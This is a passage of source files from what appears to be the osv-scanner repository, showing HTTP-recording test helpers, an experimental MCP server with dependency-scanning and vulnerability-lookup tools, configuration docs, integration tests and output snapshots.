t.Name()}, }} } // this is cassette.Interaction without its ID field type withoutID struct { Request cassette.Request `yaml:"request"` Response cassette.Response `yaml:"response"` } // custom marshaller to make cassettes pretty and to omit the "id" field from interactions // for a smaller diff since we don't care about their order func marshalCassettes(in any) (out []byte, err error) { cass, ok := in.(*cassette.Cassette) if !ok { return nil, fmt.Errorf("expected *cassette.Cassette, got %T", in) } interactions := make([]withoutID, len(cass.Interactions)) for i, interaction := range cass.Interactions { interactions[i] = withoutID{ Request: interaction.Request, Response: interaction.Response, } } input := struct { Version int `yaml:"version"` Interactions []withoutID `yaml:"interactions"` }{Version: cass.Version, Interactions: interactions} var buf bytes.Buffer enc := yaml.NewEncoder(&buf) enc.SetIndent(2) if err := enc.Encode(input); err != nil { return nil, err } return buf.Bytes(), nil } // InsertCassette returns an http.Client backed by a [recorder.Recorder] which // will record and (re)play responses from a cassette based on the tests name func InsertCassette(t *testing.T) *http.Client { t.Helper() path := filepath.Join("testdata/cassettes", strings.ReplaceAll(t.Name(), "/", "_")) r, err := recorder.New( path, recorder.WithMarshalFunc(marshalCassettes), recorder.WithSkipRequestLatency(true), recorder.WithMode(determineRecorderMode()), recorder.WithPassthrough(func(req *http.Request) bool { // exclude requests for info on a specific vuln since they can be quite large // and their changes should be less impactful to our snapshots than the query // endpoint, as those reqs are what results in specific vulns being looked up return strings.HasPrefix(req.URL.Path, "/v1/vulns/") }), recorder.WithMatcher(matcher), recorder.WithHook(func(i *cassette.Interaction) error { // remove headers that are not important to reduce cassette size and noise for _, header := range []string{ "Alt-Svc", "Grpc-Accept-Encoding", "Grpc-Message", "Grpc-Status", "Server", "Traceparent", "X-Cloud-Trace-Context", "X-Envoy-Decorator-Operation", "Date", } { delete(i.Response.Headers, header) } for header := range i.Response.Headers { if strings.HasPrefix(header, "X-Google-") { delete(i.Response.Headers, header) } } delete(i.Request.Headers, "User-Agent") // Force copy of default options, as we don't want to change the global variable prettyOptions := *pretty.DefaultOptions prettyOptions.SortKeys = true i.Request.Body = string(pretty.PrettyOptions([]byte(i.Request.Body), &prettyOptions)) i.Request.ContentLength = int64(len(i.Request.Body)) // use a static duration since we don't care about replicating latency i.Response.Duration = 0 i.Response.Body = string(pretty.PrettyOptions([]byte(i.Response.Body), &prettyOptions)) return nil }, recorder.AfterCaptureHook), ) if err != nil { t.Fatal(err) } t.Cleanup(func() { if err := r.Stop(); err != nil { t.Error(err) } sortCassetteInteractions(t, path) }) return r.GetDefaultClient() } // sortCassetteInteractions reorders the interactions in the given cassette, based // on the X-Test-Name header to help reduce the diff when interactions are changed func sortCassetteInteractions(t *testing.T, path string) { t.Helper() cass, err := cassette.Load(strings.TrimSuffix(path, ".yaml")) if err != nil { t.Fatalf("failed to load %s: %v", path, err) } cass.MarshalFunc = marshalCassettes // we don't need to worry about the interaction ids as they get updated as part of saving slices.SortFunc(cass.Interactions, func(a, b *cassette.Interaction) int { return cmp.Compare(a.Request.Headers.Get("X-Test-Name"), b.Request.Headers.Get("X-Test-Name")) }) if err = cass.Save(); err != nil { t.Fatalf("failed to write %s: %v", path, err) } } // Simplified matcher, which only looks at: // - Method // - URL // - Headers // - Body func matcher(r *http.Request, i cassette.Request) bool { if r.Method != i.Method { return false } if r.URL.String() != i.URL { return false } requestHeader := r.Header.Clone() cassetteRequestHeaders := i.Headers.Clone() for _, header := range []string{ "User-Agent", "Content-Length", } { delete(requestHeader, header) delete(cassetteRequestHeaders, header) } if !reflect.DeepEqual(requestHeader, cassetteRequestHeaders) { return false } if !matchBody(r, i) { return false } return true } func matchBody(r *http.Request, i cassette.Request) bool { if r.Body != nil { var buffer bytes.Buffer if _, err := buffer.ReadFrom(r.Body); err != nil { return false } r.Body = io.NopCloser(bytes.NewBuffer(buffer.Bytes())) if !bytes.Equal( pretty.PrettyOptions(buffer.Bytes(), &pretty.Options{SortKeys: true}), pretty.PrettyOptions([]byte(i.Body), &pretty.Options{SortKeys: true}), ) { return false } } else if len(i.Body) != 0 { return false } return true } ================================================ FILE: cmd/osv-scanner/main.go ================================================ package main import ( "os" "github.com/google/osv-scanner/v2/cmd/osv-scanner/fix" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/mcp" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan" "github.com/google/osv-scanner/v2/cmd/osv-scanner/update" ) func main() { os.Exit( cmd.Run(os.Args, os.Stdout, os.Stderr, nil, []cmd.CommandBuilder{ scan.Command, fix.Command, update.Command, mcp.Command, }), ) } ================================================ FILE: cmd/osv-scanner/main_test.go ================================================ // main cannot be accessed directly, so cannot use main_test package main import ( "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" ) //nolint:paralleltest func Test_run(t *testing.T) { tests := []testcmd.Case{ { Name: "", Args: []string{""}, Exit: 127, }, { Name: "", Args: []string{"--help"}, Exit: 127, }, { Name: "version", Args: []string{"", "--version"}, Exit: 0, }, } // No parallel because --version output is not thread safe. for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { testcmd.RunAndMatchSnapshots(t, tt) }) } } func Test_run_SubCommands(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ // without subcommands { Name: "with_no_subcommand", Args: []string{"", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // with scan subcommand { Name: "with_scan_subcommand", Args: []string{"", "scan", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // scan with a flag { Name: "scan_with_a_flag", Args: []string{"", "scan", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, // TODO: add tests for other future subcommands } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } ================================================ FILE: cmd/osv-scanner/mcp/__snapshots__/integration_test.snap ================================================ [TestIntegration_MCP_SSE_Subprocess/GetVulnerabilityDetails - 1] { "content": [ { "type": "text", "text": "{\n \"schema_version\": \"1.7.3\",\n \"id\": \"GO-2023-1558\",\n \"published\": \"2023-02-14T19:41:21Z\",\n \"modified\": \"2024-05-20T16:03:47Z\",\n \"aliases\": [\"CVE-2023-23626\", \"GHSA-2h6c-j3gf-xp9r\"],\n \"summary\": \"Denial of service via malformed size parameters in github.com/ipfs/go-bitfield\",\n \"details\": \"When feeding untrusted user input into the size parameter of NewBitfield and FromBytes functions, an attacker can trigger panics.\\n\\nThis happens when the size is a not a multiple of 8 or is negative.\\n\\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.\",\n \"affected\": [\n {\n \"package\": {\n \"name\": \"github.com/ipfs/go-bitfield\",\n \"ecosystem\": \"Go\",\n \"purl\": \"pkg:golang/github.com/ipfs/go-bitfield\"\n },\n \"ranges\": [\n {\n \"type\": \"SEMVER\",\n \"events\": [\n {\n \"introduced\": \"0\"\n },\n {\n \"fixed\": \"1.1.0\"\n }\n ]\n }\n ],\n \"ecosystem_specific\": {\n \"imports\": [\n {\n \"path\": \"github.com/ipfs/go-bitfield\",\n \"symbols\": [\"FromBytes\", \"NewBitfield\"]\n }\n ]\n },\n \"database_specific\": {\n \"source\": \"https://vuln.go.dev/ID/GO-2023-1558.json\"\n }\n }\n ],\n \"references\": [\n {\n \"type\": \"ADVISORY\",\n \"url\": \"https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r\"\n },\n {\n \"type\": \"FIX\",\n \"url\": \"https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\"\n }\n ],\n \"database_specific\": {\n \"review_status\": \"REVIEWED\",\n \"url\": \"https://pkg.go.dev/vuln/GO-2023-1558\"\n },\n \"credits\": [\n {\n \"name\": \"Jorropo\"\n }\n ]\n}\n" } ] } --- [TestIntegration_MCP_SSE_Subprocess/ScanVulnerableDependencies - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Go lockfile:/testdata/go-project/go.mod: found 1 package with issues github.com/ipfs/go-bitfield@1.0.0 has the following known vulnerabilities: GO-2023-1558: Denial of service via malformed size parameters in github.com/ipfs/go-bitfield Severity: '5.9'; Minimal Fix Version: '1.1.0'; 1 known vulnerability found in lockfile:/testdata/go-project/go.mod Hiding 9 number of vulnerabilities deemed unimportant, use --all-vulns to show them. --- ================================================ FILE: cmd/osv-scanner/mcp/command.go ================================================ // Package mcp implements the `mcp` command for osv-scanner. package mcp import ( "context" _ "embed" "errors" "fmt" "io" "strings" "sync" "time" "net/http" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/internal/version" "github.com/google/osv-scanner/v2/pkg/osvscanner" "github.com/jedib0t/go-pretty/v6/text" "github.com/modelcontextprotocol/go-sdk/mcp" "github.com/ossf/osv-schema/bindings/go/osvschema" "github.com/tidwall/pretty" "github.com/urfave/cli/v3" "google.golang.org/protobuf/encoding/protojson" "osv.dev/bindings/go/osvdev" ) var ( vulnCacheMu sync.RWMutex vulnCacheMap = make(map[string]*osvschema.Vulnerability) ) // Command is the entry point for the `mcp` subcommand. func Command(_, _ io.Writer, _ *http.Client) *cli.Command { return &cli.Command{ Name: "experimental-mcp", Usage: "Run osv-scanner as an MCP service (experimental)", Description: "Run osv-scanner as an MCP service, speaking the MCP protocol over stdin/stdout.", Flags: []cli.Flag{ &cli.StringFlag{ Name: "sse", DefaultText: "localhost:8080", Value: "localhost:8080", Usage: "The listening address for the SSE server, e.g. localhost:8080", }, }, Action: action, } } // scanVulnerableDependenciesInput is the input for the scan_vulnerable_dependencies tool. type scanVulnerableDependenciesInput struct { Paths []string `json:"paths" jsonschema:"A list of absolute or relative path to a file or directory to scan."` IgnoreGlobPatterns []string `json:"ignore_glob_patterns" jsonschema:"A list of glob patterns to ignore when scanning."` Recursive bool `json:"recursive" jsonschema:"Scans directory recursively"` } func action(ctx context.Context, cmd *cli.Command) error { s := mcp.NewServer(&mcp.Implementation{ Name: "OSV-Scanner", Version: version.OSVVersion, }, nil) mcp.AddTool(s, &mcp.Tool{ Name: "scan_vulnerable_dependencies", Description: "Scans a source directory for vulnerable dependencies." + " Walks the given directory and uses osv.dev to query for vulnerabilities matching the found dependencies." + " Use this tool to check that the user's project is not depending on known vulnerable code.", }, handleScan) // TODO(another-rex): Ideally both of the following tools would be resources, but gemini-cli does not support those yet. mcp.AddTool(s, &mcp.Tool{ Name: "get_vulnerability_details", Description: "Retrieves the full JSON details for a given vulnerability ID.", }, handleVulnIDRetrieval) mcp.AddTool(s, &mcp.Tool{ Name: "ignore_vulnerability", Description: "Provides instructions for writing a config file to exclude vulnerabilities from the scan report.", }, handleIgnoreVulnerability) s.AddPrompt(&mcp.Prompt{ Name: "scan_deps", Description: "Scans your project dependencies for known vulnerabilities.", }, handleScanDepsPrompt) // Provide two options, sse on a network port, or stdio. if cmd.IsSet("sse") { sseAddr := cmd.String("sse") cmdlogger.Infof("Starting SSE server on %s", sseAddr) handler := mcp.NewSSEHandler(func(_ *http.Request) *mcp.Server { return s }, nil) srv := &http.Server{ Addr: sseAddr, Handler: handler, ReadTimeout: 30 * time.Second, WriteTimeout: 30 * time.Second, IdleTimeout: 120 * time.Second, } if err := srv.ListenAndServe(); err != nil { cmdlogger.Errorf("mcp error: %s", err) return err } } else { cmdlogger.SendEverythingToStderr() cmdlogger.Infof("Starting MCP server on stdio") if err := s.Run(ctx, &mcp.StdioTransport{}); err != nil { cmdlogger.Errorf("mcp error: %s", err) return err } } return nil } func handleScan(_ context.Context, _ *mcp.CallToolRequest, input *scanVulnerableDependenciesInput) (*mcp.CallToolResult, any, error) { statsCollector := fileOpenedLogger{} action := osvscanner.ScannerActions{ DirectoryPaths: input.Paths, ScanLicensesSummary: false, ExperimentalScannerActions: osvscanner.ExperimentalScannerActions{ StatsCollector: &statsCollector, }, CallAnalysisStates: map[string]bool{ "go": true, }, Recursive: input.Recursive, } //nolint:contextcheck // passing the context in would be a breaking change scanResults, err := osvscanner.DoScan(action) if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) { return nil, nil, fmt.Errorf("failed to run scanner: %w", err) } vulnCacheMu.Lock() for _, vuln := range scanResults.Flatten() { vulnCacheMap[vuln.Vulnerability.GetId()] = vuln.Vulnerability } vulnCacheMu.Unlock() if err == nil { return &mcp.CallToolResult{ Content: []mcp.Content{ &mcp.TextContent{Text: "No issues found"}, }, }, nil, nil } buf := strings.Builder{} for _, s := range statsCollector.collectedLines { buf.WriteString(s + "\n") } text.DisableColors() output.PrintVerticalResults(&scanResults, &buf, false) return &mcp.CallToolResult{ Content: []mcp.Content{ &mcp.TextContent{Text: buf.String()}, }, }, nil, nil } // getVulnerabilityDetailsInput is the input for the get_vulnerability_details tool. type getVulnerabilityDetailsInput struct { VulnID string `json:"vuln_id" jsonschema:"The OSV vulnerability ID to retrieve details for."` } func handleVulnIDRetrieval(ctx context.Context, _ *mcp.CallToolRequest, input *getVulnerabilityDetailsInput) (*mcp.CallToolResult, any, error) { vulnCacheMu.RLock() vuln, found := vulnCacheMap[input.VulnID] vulnCacheMu.RUnlock() if !found { var err error vuln, err = osvdev.DefaultClient().GetVulnByID(ctx, input.VulnID) if err != nil { return nil, nil, fmt.Errorf("vulnerability with ID %s not found: %w", input.VulnID, err) } vulnCacheMu.Lock() vulnCacheMap[input.VulnID] = vuln vulnCacheMu.Unlock() } jsonBytes, err := protojson.Marshal(vuln) if err != nil { return nil, nil, err } prettyJSON := pretty.Pretty(jsonBytes) return &mcp.CallToolResult{ Content: []mcp.Content{ &mcp.TextContent{ Text: string(prettyJSON), }, }, }, nil, nil } // ignoreVulnerabilityInput is a placeholder to enable the tool call, // as it seems like go-sdk mcp does not support a tool call with no arguments. type ignoreVulnerabilityInput struct { // Extra field is needed as a placeholder to prevent the llm from erroring when calling the tool Verbose bool `json:"verbose" jsonschema:"ignore this parameter"` } //go:embed configuration-instructions.md var configInstructions string // handleIgnoreVulnerability does not perform any actual actions, but instead provides the instructions of how // to write an ignore file to the LLM using this tool, so that it can correctly write the ignore file. func handleIgnoreVulnerability(_ context.Context, _ *mcp.CallToolRequest, _ *ignoreVulnerabilityInput) (*mcp.CallToolResult, any, error) { return &mcp.CallToolResult{ Content: []mcp.Content{ &mcp.TextContent{Text: configInstructions}, }, }, nil, nil } // scanDepsPrompt is the prompt that is sent to the AI model when the scan_deps prompt is requested. // //go:embed scan-deps-prompt.md var scanDepsPrompt string func handleScanDepsPrompt(_ context.Context, _ *mcp.GetPromptRequest) (*mcp.GetPromptResult, error) { return &mcp.GetPromptResult{ Description: "Dependency vulnerability analysis", Messages: []*mcp.PromptMessage{ { Role: "assistant", Content: &mcp.TextContent{ Text: scanDepsPrompt, }, }, }, }, nil } ================================================ FILE: cmd/osv-scanner/mcp/configuration-instructions.md ================================================ --- layout: page permalink: /configuration/ nav_order: 5 --- # Configuration To configure scanning, place an osv-scanner.toml file in the scanned file's directory. This does not propagate to child directories. **Example:** ``` /Cargo.lock /osv-scanner.toml (1) /child-dir/go.mod /child-dir/osv-scanner.toml (2) /child-dir/nested-dir/package-lock.json ``` `osv-scanner.toml (1)` will only apply to `Cargo.lock`, `osv-scanner.toml (2)` will only apply to `go.mod`, and no config will apply to `package-lock.json`. To override `osv-scanner.toml` files, pass the `--config=/path/to/config.toml` flag with the path to the configuration you want to apply instead, this will apply `config.toml` to all files parsed, and ignore `osv-scanner.toml` in all directories. ## Ignore vulnerabilities by ID To ignore a vulnerability, enter the ID under the `IgnoreVulns` key. Optionally, add an expiry date or reason. ### Example ```toml [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No ssh servers are connected to or hosted in Go lang" [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No external http servers are written in Go lang." ``` Ignoring a vulnerability will also ignore vulnerabilities that are considered aliases of that vulnerability. ================================================ FILE: cmd/osv-scanner/mcp/integration_test.go ================================================ package mcp_test import ( "context" "net" "net/http" "os" "os/exec" "path/filepath" "runtime" "testing" "time" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/modelcontextprotocol/go-sdk/mcp" ) // TestIntegration_MCP_SSE_Subprocess validates the experimental-mcp command by: // 1. Building the binary. // 2. Starting it as an MCP server. // 3. Connecting a client. // 4. Running tools (scan_vulnerable_dependencies, get_vulnerability_details). // //nolint:paralleltest // This test is not parallelizable func TestIntegration_MCP_SSE_Subprocess(t *testing.T) { if testing.Short() { testutility.Skip(t, "skipping integration test in short mode") } binPath := buildTestBinary(t) addr := findFreePort(t) // Start the server ctx, cancel := context.WithCancel(context.Background()) defer cancel() cmdRun := startMCPServer(t, ctx, binPath, addr) defer func() { cancel() _ = cmdRun.Wait() }() // Wait for server to be ready baseURL := "http://" + addr + "/sse" waitForServer(t, baseURL) // Connect Client client := connectMCPClient(t, ctx, baseURL) defer client.Close() // Use persistent testdata/go-project testDataPath, err := filepath.Abs("testdata/go-project") if err != nil { t.Fatalf("failed to get absolute path: %v", err) } if _, err := os.Stat(testDataPath); os.IsNotExist(err) { t.Fatalf("testdata/go-project does not exist at %s", testDataPath) } var vulnID string // Step 1: Scan for vulnerabilities t.Run("ScanVulnerableDependencies", func(t *testing.T) { scanResult, err := client.CallTool(ctx, &mcp.CallToolParams{ Name: "scan_vulnerable_dependencies", Arguments: map[string]any{ "paths": []string{testDataPath}, "recursive": true, "ignore_glob_patterns": []string{}, }, }) if err != nil { t.Fatalf("call to scan_vulnerable_dependencies failed: %v", err) } if len(scanResult.Content) == 0 { t.Fatal("scan result content is empty") } textRes, ok := scanResult.Content[0].(*mcp.TextContent) if !ok { t.Fatalf("expected TextContent, got %T", scanResult.Content[0]) } output := textRes.Text t.Logf("Scan completed. Output length: %d", len(output)) testutility.NewSnapshot().MatchText(t, output) vulnID = "GO-2023-1558" }) // Step 2: Get details for the found vulnerability t.Run("GetVulnerabilityDetails", func(t *testing.T) { detailsResult, err := client.CallTool(ctx, &mcp.CallToolParams{ Name: "get_vulnerability_details", Arguments: map[string]any{ "vuln_id": vulnID, }, }) if err != nil { t.Fatalf("call to get_vulnerability_details failed: %v", err) } if len(detailsResult.Content) == 0 { t.Log("Details Result Content is empty") return } t.Logf("Details Result Content: %v", detailsResult.Content[0]) testutility.NewSnapshot().MatchJSON(t, detailsResult) }) } // buildTestBinary builds the osv-scanner binary to a temporary directory. func buildTestBinary(t *testing.T) string { t.Helper() tempDir := t.TempDir() binPath := filepath.Join(tempDir, "osv-scanner-mcp-test") if runtime.GOOS == "windows" { binPath += ".exe" } // We use the full package path to ensure we build the correct main package. cmdBuild := exec.CommandContext( context.Background(), "go", "build", "-ldflags", "-X 'github.com/google/osv-scanner/v2/internal/config.OSVScannerConfigName=osv-scanner-test.toml'", "-o", binPath, "github.com/google/osv-scanner/v2/cmd/osv-scanner", ) cmdBuild.Stdout = os.Stdout cmdBuild.Stderr = os.Stderr if err := cmdBuild.Run(); err != nil { t.Fatalf("failed to build binary: %v", err) } return binPath } // findFreePort lets the OS choose a free port and returns the address string (e.g. "127.0.0.1:12345"). func findFreePort(t *testing.T) string { t.Helper() var lc net.ListenConfig ln, err := lc.Listen(context.Background(), "tcp", "localhost:0") if err != nil { t.Fatalf("failed to listen: %v", err) } addr := ln.Addr().String() ln.Close() return addr } // startMCPServer starts the mcp server in a subprocess. // //nolint:revive // t should be the first argument func startMCPServer(t *testing.T, ctx context.Context, binPath, addr string) *exec.Cmd { t.Helper() cmdRun := exec.CommandContext(ctx, binPath, "experimental-mcp", "--sse", addr) cmdRun.Stderr = os.Stderr cmdRun.Stdout = os.Stdout t.Logf("Starting MCP server on %s", addr) if err := cmdRun.Start(); err != nil { t.Fatalf("failed to start server: %v", err) } return cmdRun } // connectMCPClient connects to the MCP server via SSE. // //nolint:revive // t should be the first argument func connectMCPClient(t *testing.T, ctx context.Context, baseURL string) *mcp.ClientSession { t.Helper() transport := &mcp.SSEClientTransport{ Endpoint: baseURL, } client := mcp.NewClient(&mcp.Implementation{ Name: "test-client", Version: "1.0.0", }, nil) session, err := client.Connect(ctx, transport, nil) if err != nil { t.Fatalf("failed to connect to MCP server: %v", err) } return session } func waitForServer(t *testing.T, url string) { t.Helper() deadline := time.Now().Add(15 * time.Second) for time.Now().Before(deadline) { //nolint:gosec,noctx // This is a test with a local URL resp, err := http.Get(url) if err == nil { resp.Body.Close() return } time.Sleep(100 * time.Millisecond) } t.Fatalf("server failed to start listening at %s within timeout", url) } ================================================ FILE: cmd/osv-scanner/mcp/scan-deps-prompt.md ================================================ You are a highly skilled senior security analyst. Your primary task is to conduct a security audit of the vulnerabilities in the dependencies of this project. Utilizing your skillset, you must operate by strictly following the operating principles defined in your context. **Step 1: Perform initial scan** Use the scan_vulnerable_dependencies with recursive on the project, always use the absolute path. This will return a report of all the relevant lockfiles and all vulnerable dependencies in those files. **Step 2: Analyse the report** Go through the report and determine the relevant project lockfiles (ignoring lockfiles in test directories), and prioritise which vulnerability to fix based on the description and severity. If more information is needed about a vulnerability, use get_vulnerability_details. **Step 3: Prioritisation** Give advice on which vulnerabilities to prioritise fixing, and general advice on how to go about fixing them by updating. Don't try to automatically update for the user without input. ================================================ FILE: cmd/osv-scanner/mcp/stats.go ================================================ package mcp import ( "fmt" "path/filepath" "github.com/google/osv-scalibr/stats" "github.com/google/osv-scanner/v2/internal/output" ) type fileOpenedLogger struct { stats.NoopCollector collectedLines []string } var _ stats.Collector = &fileOpenedLogger{} func (c *fileOpenedLogger) AfterExtractorRun(_ string, extractorstats *stats.AfterExtractorStats) { if extractorstats.Error != nil { // Don't log scanned if error occurred return } pkgsFound := len(extractorstats.Inventory.Packages) c.collectedLines = append(c.collectedLines, fmt.Sprintf( "Scanned %s file and found %d %s", filepath.Join(extractorstats.Root, extractorstats.Path), pkgsFound, output.Form(pkgsFound, "package", "packages"), )) } ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/go.mod ================================================ module example.com/test go 1.25.3 require github.com/ipfs/go-bitfield v1.0.0 ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/go.sum ================================================ github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/main.go ================================================ package main import ( "github.com/ipfs/go-bitfield" ) func main() { _ = bitfield.NewBitfield(1) } ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/osv-scanner-test.toml ================================================ ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/mcp/testmain_test.go ================================================ package mcp_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/mcp" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { slog.SetDefault(slog.New(testlogger.New())) // This is technically not necessary, as we are running mcp via a subprocess testcmd.CommandsUnderTest = []cmd.CommandBuilder{mcp.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/__snapshots__/command_test.snap ================================================ [TestCommand_SubCommands/scan_with_a_flag - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_SubCommands/scan_with_a_flag - 2] --- [TestCommand_SubCommands/with_no_arguments - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database. image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [TestCommand_SubCommands/with_no_arguments - 2] --- [TestCommand_SubCommands/with_no_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_SubCommands/with_no_subcommand - 2] --- [TestCommand_SubCommands/with_scan_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_SubCommands/with_scan_subcommand - 2] --- ================================================ FILE: cmd/osv-scanner/scan/command.go ================================================ // Package scan implements the `scan` command for osv-scanner. package scan import ( "io" "net/http" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/image" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/source" "github.com/urfave/cli/v3" ) const sourceSubCommand = "source" const DefaultSubcommand = sourceSubCommand var Subcommands = []string{sourceSubCommand, "image"} func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command { return &cli.Command{ Name: "scan", Usage: "scans projects and container images for dependencies, and checks them against the OSV database.", Description: "scans projects and container images for dependencies, and checks them against the OSV database.", Commands: []*cli.Command{ source.Command(stdout, stderr, client), image.Command(stdout, stderr, client), }, } } ================================================ FILE: cmd/osv-scanner/scan/command_test.go ================================================ package scan_test import ( "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" ) // Tests all subcommands here. func TestCommand_SubCommands(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "with_no_arguments", Args: []string{"", "scan"}, Exit: 127, }, // without subcommands { Name: "with_no_subcommand", Args: []string{"", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // with scan subcommand { Name: "with_scan_subcommand", Args: []string{"", "scan", "./testdata/locks-many/composer.lock"}, Exit: 0, }, // scan with a flag { Name: "scan_with_a_flag", Args: []string{"", "scan", "--recursive", "./testdata/locks-one-with-nested"}, Exit: 0, }, // TODO: add tests for other future subcommands } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } ================================================ FILE: cmd/osv-scanner/scan/image/__snapshots__/command_test.snap ================================================ [TestCommand_Docker/Fake_alpine_image - 1] Checking if docker image ("alpine:non-existent-tag") exists locally... --- [TestCommand_Docker/Fake_alpine_image - 2] Docker command exited with code ("/usr/bin/docker pull -q alpine:non-existent-tag"): 1 STDERR: > Error response from daemon: manifest for alpine:non-existent-tag not found: manifest unknown: manifest unknown failed to pull container image: failed to run docker command --- [TestCommand_Docker/Fake_image_entirely - 1] Checking if docker image ("this-image-definitely-does-not-exist-abcde:with-tag") exists locally... --- [TestCommand_Docker/Fake_image_entirely - 2] Docker command exited with code ("/usr/bin/docker pull -q this-image-definitely-does-not-exist-abcde:with-tag"): 1 STDERR: > Error response from daemon: pull access denied for this-image-definitely-does-not-exist-abcde, repository does not exist or may require 'docker login': denied: requested access to the resource is denied failed to pull container image: failed to run docker command --- [TestCommand_Docker/Real_Alpine_image - 1] Checking if docker image ("alpine:3.18.9") exists locally... Saving docker image ("alpine:3.18.9") to temporary file... Scanning image "alpine:3.18.9" Container Scanning Result (Alpine Linux v3.18) (Based on "alpine" image): Total 2 packages affected by 3 known vulnerabilities (0 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 3 vulnerabilities can be fixed. Alpine:v3.18 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | musl | 1.2.4-r2 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.1.7-r0 | Fix Available | 2 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_Docker/Real_Alpine_image - 2] --- [TestCommand_Docker/Real_empty_image_with_no_tag,_invalid_scan_target - 1] --- [TestCommand_Docker/Real_empty_image_with_no_tag,_invalid_scan_target - 2] "hello-world" is not a tagged image name --- [TestCommand_Docker/Real_empty_image_with_tag - 1] Checking if docker image ("hello-world:linux") exists locally... Saving docker image ("hello-world:linux") to temporary file... Scanning image "hello-world:linux" --- [TestCommand_Docker/Real_empty_image_with_tag - 2] No package sources found, --help for usage information. --- [TestCommand_Docker/no_image_argument - 1] --- [TestCommand_Docker/no_image_argument - 2] please provide an image name or see the help document --- [TestCommand_Docker/real_alpine_image_without_apk_extractor_enabled - 1] Checking if docker image ("alpine:3.18.9") exists locally... Saving docker image ("alpine:3.18.9") to temporary file... Scanning image 